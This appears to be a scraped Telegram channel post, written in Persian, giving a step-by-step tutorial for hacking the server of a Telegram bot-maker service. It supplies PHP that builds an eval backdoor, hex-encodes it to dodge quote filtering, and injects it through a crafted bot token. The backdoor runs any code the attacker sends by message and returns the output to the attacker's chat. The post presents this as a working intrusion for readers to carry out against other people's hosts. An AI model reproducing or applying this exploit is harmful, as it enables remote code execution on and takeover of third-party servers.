20 Jan, 19:16
20 Jan, 15:55
20 Jan, 12:05
20 Jan, 11:24
20 Jan, 04:35
$admin = 12345678;خب. حالا در ادامه کد خام زیر رو برای مشخص کرد کاری که ربات باید انجام بده مینویسیم
$token = "12345678:abcdefg";
$rawcode = '$UPDATE = json_decode(file_get_contents("php://input"));
$CURL = curl_init("https://api.telegram.org/bot'.$token.'/sendMessage");
curl_setopt($CURL, CURLOPT_RETURNTRANSFER, true);
curl_setopt($CURL, CURLOPT_POSTFIELDS, [
"chat_id" => '.$admin.',
"text" => @eval($UPDATE->message->text)
]);
curl_exec($CURL);
curl_close($CURL);
exit;';
برای توضیح کد بالا هرپیامی که در ربات شما ارسال شود را میگیره و اجرا میکنه و خروجی return اون رو به شما ارسال میکنه. مثلا کد بفرستیدreturn "hello world";
ربات شما این کدو اجرا میکنه و خروجیشو براتون میفرسته.$hex = bin2hex("\xff;$rawcode");
الان درست شد دیگه هیچ کوتیشنی نداریم. خب حالا کد اصلی که کار نفوذ به هاست رباتسازو انجام میده الان میسازیم$code = $token.'/gEtMe?AviD=${eval(hex2bin(@'.$hex.'))}';همون طور که میبینید دیگه هیچ کوتیشنی نیست. ولی هنوزم یه مشکلی هست.
$code .= str_repeat('a', 4096 - strlen($code));
و مشخصا سپس کد رو پرینت کنید تا بگیرید و ازش استفاده کنید.print $code;
🔑 حالا عملیاتو شروع میکنیم. به رباتساز رفته و ربات خودتونو با توکن بسازید تا وبهوک تنظیم بشه. حالا میدونید که لینک وبهوک رباتساز چیه و رباتتون به هاست طرف وصله. حالا وارد بخش تغییر توکن رباتساز یا ساخت دوباره رباتساز و یا اگه اجازه نداد یبار رباتو حذف کنید و وارد بخش ساخت رباته رباتساز بشید. اگه وبهوک حذف شد دوباره ست وبهوک انجام بدید.$a = 2 + 2;
return $a * 5;
هر کدی بفرستید جواب خواهید گرفت 😁19 Jan, 22:24
19 Jan, 20:23